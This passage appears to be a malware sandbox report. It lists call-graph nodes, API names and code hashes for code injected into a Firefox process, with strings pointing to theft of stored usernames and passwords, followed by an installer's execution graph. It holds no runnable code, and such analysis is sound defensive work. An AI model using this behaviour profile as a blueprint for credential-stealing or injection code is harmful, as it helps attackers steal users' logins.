4980 244a227b412 LdrLoadDll 4979->4980 4981 244a227c9c9 4980->4981 4982 244a227b412 LdrLoadDll 4981->4982 4981->4983 4982->4983 4983->4858 4985 244a22796a6 4984->4985 4986 244a227b412 LdrLoadDll 4985->4986 4987 244a22796ee 4986->4987 4987->4860 4989 244a2276496 4988->4989 4990 244a227631b 4988->4990 4989->4884 4990->4989 4991 244a227b412 LdrLoadDll 4990->4991 4992 244a2276343 4991->4992 4993 244a227b412 LdrLoadDll 4992->4993 4994 244a2276360 4993->4994 4995 244a227b412 LdrLoadDll 4994->4995 4996 244a227637d 4995->4996 4997 244a227b412 LdrLoadDll 4996->4997 4998 244a227639a 4997->4998 4999 244a227b412 LdrLoadDll 4998->4999 5000 244a22763b7 4999->5000 5001 244a227b412 LdrLoadDll 5000->5001 5002 244a22763d4 5001->5002 5003 244a227b412 LdrLoadDll 5002->5003 5004 244a22763f1 5003->5004 5005 244a227b412 LdrLoadDll 5004->5005 5006 244a227640e 5005->5006 5007 244a227b412 LdrLoadDll 5006->5007 5008 244a227642b 5007->5008 5009 244a227b412 LdrLoadDll 5008->5009 5010 244a2276448 5009->5010 5011 244a227b412 LdrLoadDll 5010->5011 5012 244a2276465 5011->5012 5013 244a227b412 LdrLoadDll 5012->5013 5014 244a2276482 5013->5014 5014->4884 5016 244a2279672 LdrLoadDll 5015->5016 5017 244a22765a9 5016->5017 5018 244a227b412 LdrLoadDll 5017->5018 5019 244a227665b 5018->5019 5020 244a227b412 LdrLoadDll 5019->5020 5021 244a2276681 5020->5021 5022 244a22767f2 5021->5022 5023 244a22766a0 GetPrivateProfileSectionNamesW 5021->5023 5028 244a227ac42 5022->5028 5024 244a22766bd 5023->5024 5034 244a2275b22 5024->5034 5026 244a22766dd 5026->5022 5038 244a2275f62 5026->5038 5029 244a227ac5c 5028->5029 5030 244a227b412 LdrLoadDll 5029->5030 5033 244a2276a60 5029->5033 5031 244a227ac87 5030->5031 5032 244a227b412 LdrLoadDll 5031->5032 5032->5033 5033->4893 5035 244a2275b73 5034->5035 5037 244a2275cda 5035->5037 5047 244a227ad02 5035->5047 5037->5026 5039 244a2275fb0 5038->5039 5040 244a227ad02 2 API calls 5039->5040 5044 244a22760dc 5040->5044 5041 244a22762e2 5041->5026 5042 244a22762c3 5043 
244a227ac42 LdrLoadDll 5042->5043 5043->5041 5044->5041 5044->5042 5045 244a2275b22 LdrLoadDll NtCreateFile 5044->5045 5046 244a2275dd2 LdrLoadDll NtCreateFile 5044->5046 5045->5044 5046->5044 5048 244a227b38d 5047->5048 5050 244a227ad2c 5047->5050 5048->5037 5049 244a227adc0 5052 244a227ae04 5049->5052 5053 244a227ae71 5049->5053 5071 244a227ae2f 5049->5071 5050->5048 5050->5049 5051 244a227b412 LdrLoadDll 5050->5051 5051->5049 5055 244a227b412 LdrLoadDll 5052->5055 5052->5071 5056 244a227b412 LdrLoadDll 5053->5056 5059 244a227ae99 5053->5059 5054 244a227aee0 NtCreateFile 5058 244a227ac42 LdrLoadDll 5054->5058 5055->5071 5056->5059 5057 244a227b412 LdrLoadDll 5060 244a227aed0 5057->5060 5061 244a227af2d 5058->5061 5059->5054 5059->5057 5059->5071 5060->5054 5060->5071 5062 244a227b412 LdrLoadDll 5061->5062 5063 244a227af7e 5061->5063 5061->5071 5062->5063 5064 244a227afd0 5063->5064 5065 244a227b02e 5063->5065 5063->5071 5068 244a227b412 LdrLoadDll 5064->5068 5064->5071 5066 244a227b037 5065->5066 5067 244a227b0e6 5065->5067 5066->5071 5075 244a227b412 LdrLoadDll 5066->5075 5069 244a227b188 5067->5069 5070 244a227b0ef 5067->5070 5068->5071 5072 244a227b209 5069->5072 5073 244a227b18d 5069->5073 5074 244a227b117 5070->5074 5076 244a227b412 LdrLoadDll 5070->5076 5071->5037 5077 244a227b294 5072->5077 5078 244a227b212 5072->5078 5073->5071 5080 244a227b412 LdrLoadDll 5073->5080 5074->5071 5079 244a227c992 LdrLoadDll 5074->5079 5075->5071 5076->5074 5077->5071 5081 244a227b2c5 5077->5081 5083 244a227b412 LdrLoadDll 5077->5083 5078->5071 5082 244a227b412 LdrLoadDll 5078->5082 5079->5071 5080->5071 5081->5071 5084 244a227b412 LdrLoadDll 5081->5084 5082->5071 5083->5081 5084->5071 5090 244a227b642 5085->5090 5087 244a227ba11 5087->4897 5088 244a227b997 5088->5087 5089 244a227b412 LdrLoadDll 5088->5089 5089->5087 5092 244a227b674 5090->5092 5091 244a227b6e2 5091->5088 5092->5091 5093 244a22794e2 LdrLoadDll 5092->5093 5094 244a227b71d 5093->5094 5094->5091 5097 244a227b783 
5094->5097 5099 244a227ca32 5094->5099 5095 244a227b801 5095->5088 5097->5095 5098 244a227b982 LdrLoadDll 5097->5098 5098->5095 5100 244a227ca5d 5099->5100 5101 244a227ca47 5099->5101 5100->5097 5102 244a227b412 LdrLoadDll 5101->5102 5102->5100 5104 244a2279cfe 5103->5104 5105 244a227b412 LdrLoadDll 5104->5105 5114 244a2279e56 5104->5114 5106 244a2279d6f 5105->5106 5107 244a2279a82 LdrLoadDll 5106->5107 5106->5114 5108 244a2279d92 5107->5108 5109 244a227b412 LdrLoadDll 5108->5109 5108->5114 5110 244a2279e29 5109->5110 5111 244a227b412 LdrLoadDll 5110->5111 5110->5114 5112 244a2279e7c 5111->5112 5113 244a227b412 LdrLoadDll 5112->5113 5112->5114 5113->5114 5114->4809 5116 244a2274b3e 5115->5116 5122 244a2274c69 5116->5122 5131 244a22749c2 5116->5131 5118 244a2274c3f 5119 244a22749c2 LdrLoadDll 5118->5119 5118->5122 5120 244a2274c54 5119->5120 5121 244a22749c2 LdrLoadDll 5120->5121 5120->5122 5121->5122 5122->4925 5124 244a2279ac7 5123->5124 5124->5124 5125 244a227b412 LdrLoadDll 5124->5125 5126 244a2279b0d 5125->5126 5127 244a227b412 LdrLoadDll 5126->5127 5128 244a2279b36 5127->5128 5129 244a227b412 LdrLoadDll 5128->5129 5130 244a2279b91 5128->5130 5129->5130 5130->4928 5132 244a2274a1c 5131->5132 5133 244a227b412 LdrLoadDll 5132->5133 5134 244a2274a35 5133->5134 5134->5118 5136 244a227980d 5135->5136 5137 244a227b412 LdrLoadDll 5136->5137 5138 244a2279900 5137->5138 5138->4944 5140 244a2279672 LdrLoadDll 5139->5140 5141 244a227a7ba 5139->5141 5140->5141 5141->4946 5292 244a227d4e3 5293 244a227d4ed 5292->5293 5296 244a2273f72 5293->5296 5295 244a227d510 5297 244a2273f91 5296->5297 5300 244a2273faa 5296->5300 5301 244a22730f2 5297->5301 5300->5295 5302 244a2273109 5301->5302 5306 244a22731af 5301->5306 5303 244a2273012 LdrLoadDll 5302->5303 5304 244a2273118 5303->5304 5305 244a227ba52 LdrLoadDll 5304->5305 5305->5306 5306->5295 5539 244a2273363 5540 244a2273367 5539->5540 5541 244a227b412 LdrLoadDll 5540->5541 5542 244a22733a0 5540->5542 5541->5542 5307 244a22775e0 
5308 244a22775e3 5307->5308 5313 244a2277492 5308->5313 5310 244a2277698 5317 244a22784d2 5310->5317 5314 244a22774be 5313->5314 5321 244a2276b72 5314->5321 5316 244a22774cb 5316->5310 5318 244a227850d 5317->5318 5320 244a2278081 5317->5320 5319 244a227b412 LdrLoadDll 5318->5319 5319->5320 5322 244a2276be4 5321->5322 5323 244a22794e2 LdrLoadDll 5322->5323 5324 244a2276c18 5323->5324 5325 244a227b412 LdrLoadDll 5324->5325 5326 244a2276c35 5325->5326 5326->5316 5543 244a227c758 5544 244a227c762 5543->5544 5545 244a227c770 5544->5545 5549 244a227c77c 5544->5549 5546 244a2279f12 LdrLoadDll 5545->5546 5547 244a227c775 5546->5547 5548 244a227c8fa 5549->5548 5550 244a22780a2 LdrLoadDll 5549->5550 5551 244a227c7dc 5550->5551 5551->5548 5552 244a2274362 LdrLoadDll 5551->5552 5553 244a227c7ec 5552->5553 5553->5548 5554 244a227c80d 5553->5554 5556 244a227c81a 5553->5556 5557 244a227c815 5553->5557 5555 244a227a8a2 LdrLoadDll 5554->5555 5555->5557 5556->5557 5558 244a22734b2 LdrLoadDll 5556->5558 5557->5548 5561 244a2276812 3 API calls 5557->5561 5559 244a227c835 5558->5559 5560 244a227a8a2 LdrLoadDll 5559->5560 5562 244a227c83d 5560->5562 5563 244a227c8d9 5561->5563 5564 244a227c894 5562->5564 5568 244a227c85f 5562->5568 5565 244a227b412 LdrLoadDll 5563->5565 5567 244a2273372 LdrLoadDll 5564->5567 5566 244a227c8f6 ExitProcess 5565->5566 5567->5557 5569 244a22794e2 LdrLoadDll 5568->5569 5570 244a227c872 5569->5570

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
Similarity
• API ID: NamesPrivateProfileSection
• String ID: UR$2$L: $Pass$User$name$word
• API String ID: 709140578-2058692283
• Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
• Instruction ID: 669b748ccd03c7e85e5884b1ded8f4c967cae589fb3d22fb1793da468f9d4dc9
• Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
• Instruction Fuzzy Hash: 94A1B371A1C7588FEB18EF68D4587EEB7E1FB94304F104A2DE84ADB282DF7085458785
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
Similarity
• API ID: CreateFile
• String ID: `
• API String ID: 823142352-2679148245
• Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
• Instruction ID: abea967ae8edb6d6d4ce2724c1d9422bd7716d4d704eda4380c0be83c93b2b92
• Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
• Instruction Fuzzy Hash: E02280B1A1CA198FDB98EF28C4A97ADF7E1FB58305F50062EE45ED7290DB309441DB81
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
• Instruction ID: 75f50441f727178a7e6f7d6525e7fcd617a1d8bbc0a3be88f22c0ad8d6a2a2e3
• Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
• Instruction Fuzzy Hash: 834189B229C6244AFBA5B738446D7E9E2D1FBC5308FE40C259C0ADE393DE24D841A252
Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000021.00000002.4636191248.00000244A21B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00000244A21B0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_33_2_244a21b0000_firefox.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                • Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                                                                                                • Instruction ID: 26a18f2e753bf41f1b66b113e86482d7980f59922610c38e1220973b791bc6dc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E01D87214CB184BE754F734D8ED7A7F3D5FBD8308F50092AAC4ECA290EA34D6409642
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:18.4%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:1346
                                                                                                                                                                                                                                Total number of Limit Nodes:21
5 API calls 4246->4248 4248->4249 4249->4244 4250 404ed4 4 API calls 4249->4250 4250->4241 4251 402f93 4252 402fa5 SetTimer 4251->4252 4253 402fbe 4251->4253 4252->4253 4254 403013 4253->4254 4255 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4253->4255 4255->4254 4256 401d17 4257 402d84 17 API calls 4256->4257 4258 401d1d IsWindow 4257->4258 4259 401a20 4258->4259 3155 403f9a 3156 403fb2 3155->3156 3157 404113 3155->3157 3156->3157 3158 403fbe 3156->3158 3159 404124 GetDlgItem GetDlgItem 3157->3159 3176 404164 3157->3176 3161 403fc9 SetWindowPos 3158->3161 3162 403fdc 3158->3162 3160 404499 18 API calls 3159->3160 3163 40414e SetClassLongW 3160->3163 3161->3162 3166 403fe5 ShowWindow 3162->3166 3167 404027 3162->3167 3168 40140b 2 API calls 3163->3168 3164 4041be 3172 40410e 3164->3172 3228 4044e5 3164->3228 3173 404100 3166->3173 3174 404005 GetWindowLongW 3166->3174 3169 404046 3167->3169 3170 40402f DestroyWindow 3167->3170 3168->3176 3178 40404b SetWindowLongW 3169->3178 3179 40405c 3169->3179 3177 404422 3170->3177 3171 401389 2 API calls 3180 404196 3171->3180 3250 404500 3173->3250 3174->3173 3175 40401e ShowWindow 3174->3175 3175->3167 3176->3164 3176->3171 3177->3172 3186 404453 ShowWindow 3177->3186 3178->3172 3179->3173 3183 404068 GetDlgItem 3179->3183 3180->3164 3184 40419a SendMessageW 3180->3184 3182 404424 DestroyWindow EndDialog 3182->3177 3187 404096 3183->3187 3188 404079 SendMessageW IsWindowEnabled 3183->3188 3184->3172 3185 40140b 2 API calls 3195 4041d0 3185->3195 3186->3172 3190 4040a3 3187->3190 3192 4040ea SendMessageW 3187->3192 3193 4040b6 3187->3193 3201 40409b 3187->3201 3188->3172 3188->3187 3189 40657a 17 API calls 3189->3195 3190->3192 3190->3201 3192->3173 3196 4040d3 3193->3196 3197 4040be 3193->3197 3194 4040d1 3194->3173 3195->3172 3195->3182 3195->3185 3195->3189 3199 404499 18 API calls 3195->3199 3219 404364 DestroyWindow 3195->3219 3231 404499 3195->3231 3200 40140b 2 API calls 3196->3200 3244 40140b 3197->3244 
3199->3195 3202 4040da 3200->3202 3247 404472 3201->3247 3202->3173 3202->3201 3204 40424b GetDlgItem 3205 404260 3204->3205 3206 404268 ShowWindow KiUserCallbackDispatcher 3204->3206 3205->3206 3234 4044bb KiUserCallbackDispatcher 3206->3234 3208 404292 EnableWindow 3213 4042a6 3208->3213 3209 4042ab GetSystemMenu EnableMenuItem SendMessageW 3210 4042db SendMessageW 3209->3210 3209->3213 3210->3213 3213->3209 3235 4044ce SendMessageW 3213->3235 3236 403f7b 3213->3236 3239 40653d lstrcpynW 3213->3239 3215 40430a lstrlenW 3216 40657a 17 API calls 3215->3216 3217 404320 SetWindowTextW 3216->3217 3240 401389 3217->3240 3219->3177 3220 40437e CreateDialogParamW 3219->3220 3220->3177 3221 4043b1 3220->3221 3222 404499 18 API calls 3221->3222 3223 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3222->3223 3224 401389 2 API calls 3223->3224 3225 404402 3224->3225 3225->3172 3226 40440a ShowWindow 3225->3226 3227 4044e5 SendMessageW 3226->3227 3227->3177 3229 4044fd 3228->3229 3230 4044ee SendMessageW 3228->3230 3229->3195 3230->3229 3232 40657a 17 API calls 3231->3232 3233 4044a4 SetDlgItemTextW 3232->3233 3233->3204 3234->3208 3235->3213 3237 40657a 17 API calls 3236->3237 3238 403f89 SetWindowTextW 3237->3238 3238->3213 3239->3215 3242 401390 3240->3242 3241 4013fe 3241->3195 3242->3241 3243 4013cb MulDiv SendMessageW 3242->3243 3243->3242 3245 401389 2 API calls 3244->3245 3246 401420 3245->3246 3246->3201 3248 404479 3247->3248 3249 40447f SendMessageW 3247->3249 3248->3249 3249->3194 3251 4045c3 3250->3251 3252 404518 GetWindowLongW 3250->3252 3251->3172 3252->3251 3253 40452d 3252->3253 3253->3251 3254 40455a GetSysColor 3253->3254 3255 40455d 3253->3255 3254->3255 3256 404563 SetTextColor 3255->3256 3257 40456d SetBkMode 3255->3257 3256->3257 3258 404585 GetSysColor 3257->3258 3259 40458b 3257->3259 3258->3259 3260 404592 SetBkColor 3259->3260 3261 40459c 3259->3261 3260->3261 3261->3251 3262 4045b6 CreateBrushIndirect 3261->3262 3263 4045af 
DeleteObject 3261->3263 3262->3251 3263->3262 4260 401b9b 4261 401ba8 4260->4261 4262 401bec 4260->4262 4265 401c31 4261->4265 4270 401bbf 4261->4270 4263 401bf1 4262->4263 4264 401c16 GlobalAlloc 4262->4264 4276 40239d 4263->4276 4281 40653d lstrcpynW 4263->4281 4267 40657a 17 API calls 4264->4267 4266 40657a 17 API calls 4265->4266 4265->4276 4268 402397 4266->4268 4267->4265 4274 405b9d MessageBoxIndirectW 4268->4274 4279 40653d lstrcpynW 4270->4279 4272 401c03 GlobalFree 4272->4276 4273 401bce 4280 40653d lstrcpynW 4273->4280 4274->4276 4277 401bdd 4282 40653d lstrcpynW 4277->4282 4279->4273 4280->4277 4281->4272 4282->4276 4283 40261c 4284 402da6 17 API calls 4283->4284 4285 402623 4284->4285 4288 40602d GetFileAttributesW CreateFileW 4285->4288 4287 40262f 4288->4287 3580 40259e 3591 402de6 3580->3591 3584 4025b1 3585 4025d9 RegEnumValueW 3584->3585 3586 4025cd RegEnumKeyW 3584->3586 3589 40292e 3584->3589 3587 4025f5 RegCloseKey 3585->3587 3588 4025ee 3585->3588 3586->3587 3587->3589 3588->3587 3592 402da6 17 API calls 3591->3592 3593 402dfd 3592->3593 3594 4063aa RegOpenKeyExW 3593->3594 3595 4025a8 3594->3595 3596 402d84 3595->3596 3597 40657a 17 API calls 3596->3597 3598 402d99 3597->3598 3598->3584 4289 40149e 4290 4014ac PostQuitMessage 4289->4290 4291 40239d 4289->4291 4290->4291 4292 4015a3 4293 402da6 17 API calls 4292->4293 4294 4015aa SetFileAttributesW 4293->4294 4295 4015bc 4294->4295 4296 401fa4 4297 402da6 17 API calls 4296->4297 4298 401faa 4297->4298 4299 40559f 24 API calls 4298->4299 4300 401fb4 4299->4300 4301 405b20 2 API calls 4300->4301 4302 401fba 4301->4302 4303 401fdd CloseHandle 4302->4303 4305 4069b5 5 API calls 4302->4305 4306 40292e 4302->4306 4303->4306 4307 401fcf 4305->4307 4307->4303 4309 406484 wsprintfW 4307->4309 4309->4303 4310 40202a 4311 402da6 17 API calls 4310->4311 4312 402031 4311->4312 4313 40690a 5 API calls 4312->4313 4314 402040 4313->4314 4315 40205c GlobalAlloc 4314->4315 4324 4020cc 4314->4324 4316 402070 
4315->4316 4315->4324 4317 40690a 5 API calls 4316->4317 4318 402077 4317->4318 4319 40690a 5 API calls 4318->4319 4320 402081 4319->4320 4320->4324 4325 406484 wsprintfW 4320->4325 4322 4020ba 4326 406484 wsprintfW 4322->4326 4325->4322 4326->4324 4327 40252a 4328 402de6 17 API calls 4327->4328 4329 402534 4328->4329 4330 402da6 17 API calls 4329->4330 4331 40253d 4330->4331 4332 402548 RegQueryValueExW 4331->4332 4333 40292e 4331->4333 4334 402568 4332->4334 4337 40256e RegCloseKey 4332->4337 4334->4337 4338 406484 wsprintfW 4334->4338 4337->4333 4338->4337 4339 4021aa 4340 402da6 17 API calls 4339->4340 4341 4021b1 4340->4341 4342 402da6 17 API calls 4341->4342 4343 4021bb 4342->4343 4344 402da6 17 API calls 4343->4344 4345 4021c5 4344->4345 4346 402da6 17 API calls 4345->4346 4347 4021cf 4346->4347 4348 402da6 17 API calls 4347->4348 4349 4021d9 4348->4349 4350 402218 CoCreateInstance 4349->4350 4351 402da6 17 API calls 4349->4351 4354 402237 4350->4354 4351->4350 4352 401423 24 API calls 4353 4022f6 4352->4353 4354->4352 4354->4353 4355 403baa 4356 403bb5 4355->4356 4357 403bbc GlobalAlloc 4356->4357 4358 403bb9 4356->4358 4357->4358 3264 40352d SetErrorMode GetVersionExW 3265 4035b7 3264->3265 3266 40357f GetVersionExW 3264->3266 3267 403610 3265->3267 3268 40690a 5 API calls 3265->3268 3266->3265 3269 40689a 3 API calls 3267->3269 3268->3267 3270 403626 lstrlenA 3269->3270 3270->3267 3271 403636 3270->3271 3272 40690a 5 API calls 3271->3272 3273 40363d 3272->3273 3274 40690a 5 API calls 3273->3274 3275 403644 3274->3275 3276 40690a 5 API calls 3275->3276 3280 403650 #17 OleInitialize SHGetFileInfoW 3276->3280 3279 40369d GetCommandLineW 3355 40653d lstrcpynW 3279->3355 3354 40653d lstrcpynW 3280->3354 3282 4036af 3283 405e39 CharNextW 3282->3283 3284 4036d5 CharNextW 3283->3284 3296 4036e6 3284->3296 3285 4037e4 3286 4037f8 GetTempPathW 3285->3286 3356 4034fc 3286->3356 3288 403810 3290 403814 GetWindowsDirectoryW lstrcatW 3288->3290 3291 40386a DeleteFileW 
3288->3291 3289 405e39 CharNextW 3289->3296 3292 4034fc 12 API calls 3290->3292 3366 40307d GetTickCount GetModuleFileNameW 3291->3366 3294 403830 3292->3294 3294->3291 3297 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3294->3297 3295 40387d 3299 403a59 ExitProcess OleUninitialize 3295->3299 3301 403932 3295->3301 3309 405e39 CharNextW 3295->3309 3296->3285 3296->3289 3298 4037e6 3296->3298 3300 4034fc 12 API calls 3297->3300 3450 40653d lstrcpynW 3298->3450 3303 403a69 3299->3303 3304 403a7e 3299->3304 3308 403862 3300->3308 3394 403bec 3301->3394 3458 405b9d 3303->3458 3306 403a86 GetCurrentProcess OpenProcessToken 3304->3306 3307 403afc ExitProcess 3304->3307 3312 403acc 3306->3312 3313 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3306->3313 3308->3291 3308->3299 3323 40389f 3309->3323 3316 40690a 5 API calls 3312->3316 3313->3312 3314 403941 3314->3299 3319 403ad3 3316->3319 3317 403908 3320 405f14 18 API calls 3317->3320 3318 403949 3322 405b08 5 API calls 3318->3322 3321 403ae8 ExitWindowsEx 3319->3321 3325 403af5 3319->3325 3324 403914 3320->3324 3321->3307 3321->3325 3326 40394e lstrcatW 3322->3326 3323->3317 3323->3318 3324->3299 3451 40653d lstrcpynW 3324->3451 3329 40140b 2 API calls 3325->3329 3327 40396a lstrcatW lstrcmpiW 3326->3327 3328 40395f lstrcatW 3326->3328 3327->3314 3330 40398a 3327->3330 3328->3327 3329->3307 3332 403996 3330->3332 3333 40398f 3330->3333 3336 405aeb 2 API calls 3332->3336 3335 405a6e 4 API calls 3333->3335 3334 403927 3452 40653d lstrcpynW 3334->3452 3338 403994 3335->3338 3339 40399b SetCurrentDirectoryW 3336->3339 3338->3339 3340 4039b8 3339->3340 3341 4039ad 3339->3341 3454 40653d lstrcpynW 3340->3454 3453 40653d lstrcpynW 3341->3453 3344 40657a 17 API calls 3345 4039fa DeleteFileW 3344->3345 3346 403a06 CopyFileW 3345->3346 3351 4039c5 3345->3351 3346->3351 3347 403a50 3349 4062fd 36 API calls 3347->3349 3348 4062fd 36 API calls 3348->3351 3349->3314 3350 40657a 17 API calls 
3350->3351 3351->3344 3351->3347 3351->3348 3351->3350 3353 403a3a CloseHandle 3351->3353 3455 405b20 CreateProcessW 3351->3455 3353->3351 3354->3279 3355->3282 3357 4067c4 5 API calls 3356->3357 3359 403508 3357->3359 3358 403512 3358->3288 3359->3358 3360 405e0c 3 API calls 3359->3360 3361 40351a 3360->3361 3362 405aeb 2 API calls 3361->3362 3363 403520 3362->3363 3462 40605c 3363->3462 3466 40602d GetFileAttributesW CreateFileW 3366->3466 3368 4030bd 3386 4030cd 3368->3386 3467 40653d lstrcpynW 3368->3467 3370 4030e3 3371 405e58 2 API calls 3370->3371 3372 4030e9 3371->3372 3468 40653d lstrcpynW 3372->3468 3374 4030f4 GetFileSize 3375 4031ee 3374->3375 3393 40310b 3374->3393 3469 403019 3375->3469 3377 4031f7 3379 403227 GlobalAlloc 3377->3379 3377->3386 3506 4034e5 SetFilePointer 3377->3506 3480 4034e5 SetFilePointer 3379->3480 3381 40325a 3383 403019 6 API calls 3381->3383 3383->3386 3384 403210 3387 4034cf ReadFile 3384->3387 3385 403242 3481 4032b4 3385->3481 3386->3295 3389 40321b 3387->3389 3389->3379 3389->3386 3390 403019 6 API calls 3390->3393 3391 40324e 3391->3386 3391->3391 3392 40328b SetFilePointer 3391->3392 3392->3386 3393->3375 3393->3381 3393->3386 3393->3390 3503 4034cf 3393->3503 3395 40690a 5 API calls 3394->3395 3396 403c00 3395->3396 3397 403c06 3396->3397 3398 403c18 3396->3398 3527 406484 wsprintfW 3397->3527 3399 40640b 3 API calls 3398->3399 3400 403c48 3399->3400 3401 403c67 lstrcatW 3400->3401 3403 40640b 3 API calls 3400->3403 3404 403c16 3401->3404 3403->3401 3512 403ec2 3404->3512 3407 405f14 18 API calls 3408 403c99 3407->3408 3409 403d2d 3408->3409 3411 40640b 3 API calls 3408->3411 3410 405f14 18 API calls 3409->3410 3412 403d33 3410->3412 3414 403ccb 3411->3414 3413 403d43 LoadImageW 3412->3413 3415 40657a 17 API calls 3412->3415 3416 403de9 3413->3416 3417 403d6a RegisterClassW 3413->3417 3414->3409 3418 403cec lstrlenW 3414->3418 3422 405e39 CharNextW 3414->3422 3415->3413 3421 40140b 2 API calls 3416->3421 3419 403da0 
SystemParametersInfoW CreateWindowExW 3417->3419 3420 403df3 3417->3420 3423 403d20 3418->3423 3424 403cfa lstrcmpiW 3418->3424 3419->3416 3420->3314 3425 403def 3421->3425 3426 403ce9 3422->3426 3428 405e0c 3 API calls 3423->3428 3424->3423 3427 403d0a GetFileAttributesW 3424->3427 3425->3420 3430 403ec2 18 API calls 3425->3430 3426->3418 3429 403d16 3427->3429 3431 403d26 3428->3431 3429->3423 3432 405e58 2 API calls 3429->3432 3433 403e00 3430->3433 3528 40653d lstrcpynW 3431->3528 3432->3423 3435 403e0c ShowWindow 3433->3435 3436 403e8f 3433->3436 3438 40689a 3 API calls 3435->3438 3520 405672 OleInitialize 3436->3520 3440 403e24 3438->3440 3439 403e95 3441 403eb1 3439->3441 3442 403e99 3439->3442 3443 403e32 GetClassInfoW 3440->3443 3445 40689a 3 API calls 3440->3445 3444 40140b 2 API calls 3441->3444 3442->3420 3449 40140b 2 API calls 3442->3449 3446 403e46 GetClassInfoW RegisterClassW 3443->3446 3447 403e5c DialogBoxParamW 3443->3447 3444->3420 3445->3443 3446->3447 3448 40140b 2 API calls 3447->3448 3448->3420 3449->3420 3450->3286 3451->3334 3452->3301 3453->3340 3454->3351 3456 405b53 CloseHandle 3455->3456 3457 405b5f 3455->3457 3456->3457 3457->3351 3459 405bb2 3458->3459 3460 403a76 ExitProcess 3459->3460 3461 405bc6 MessageBoxIndirectW 3459->3461 3461->3460 3463 406069 GetTickCount GetTempFileNameW 3462->3463 3464 40352b 3463->3464 3465 40609f 3463->3465 3464->3288 3465->3463 3465->3464 3466->3368 3467->3370 3468->3374 3470 403022 3469->3470 3471 40303a 3469->3471 3472 403032 3470->3472 3473 40302b DestroyWindow 3470->3473 3474 403042 3471->3474 3475 40304a GetTickCount 3471->3475 3472->3377 3473->3472 3507 406946 3474->3507 3477 403058 CreateDialogParamW ShowWindow 3475->3477 3478 40307b 3475->3478 3477->3478 3478->3377 3480->3385 3482 4032cd 3481->3482 3483 4032fb 3482->3483 3511 4034e5 SetFilePointer 3482->3511 3485 4034cf ReadFile 3483->3485 3486 403306 3485->3486 3487 403468 3486->3487 3488 403318 GetTickCount 3486->3488 3498 403464 3486->3498 
3489 4034aa 3487->3489 3493 40346c 3487->3493 3488->3498 3502 403367 3488->3502 3491 4034cf ReadFile 3489->3491 3490 4034cf ReadFile 3490->3502 3491->3498 3492 4034cf ReadFile 3492->3493 3493->3492 3494 40348e 3493->3494 3493->3498 3494->3493 3495 4060df WriteFile 3494->3495 3496 403452 3494->3496 3494->3498 3495->3494 3496->3498 3497 4033bd GetTickCount 3497->3502 3498->3391 3499 4033e2 MulDiv wsprintfW 3500 40559f 24 API calls 3499->3500 3500->3502 3501 4060df WriteFile 3501->3502 3502->3490 3502->3496 3502->3497 3502->3498 3502->3499 3502->3501 3504 4060b0 ReadFile 3503->3504 3505 4034e2 3504->3505 3505->3393 3506->3384 3508 406963 PeekMessageW 3507->3508 3509 403048 3508->3509 3510 406959 DispatchMessageW 3508->3510 3509->3377 3510->3508 3511->3483 3513 403ed6 3512->3513 3529 406484 wsprintfW 3513->3529 3515 403f47 3516 403f7b 18 API calls 3515->3516 3518 403f4c 3516->3518 3517 403c77 3517->3407 3518->3517 3519 40657a 17 API calls 3518->3519 3519->3518 3521 4044e5 SendMessageW 3520->3521 3524 405695 3521->3524 3522 4056bc 3523 4044e5 SendMessageW 3522->3523 3525 4056ce OleUninitialize 3523->3525 3524->3522 3526 401389 2 API calls 3524->3526 3525->3439 3526->3524 3527->3404 3528->3409 3529->3515 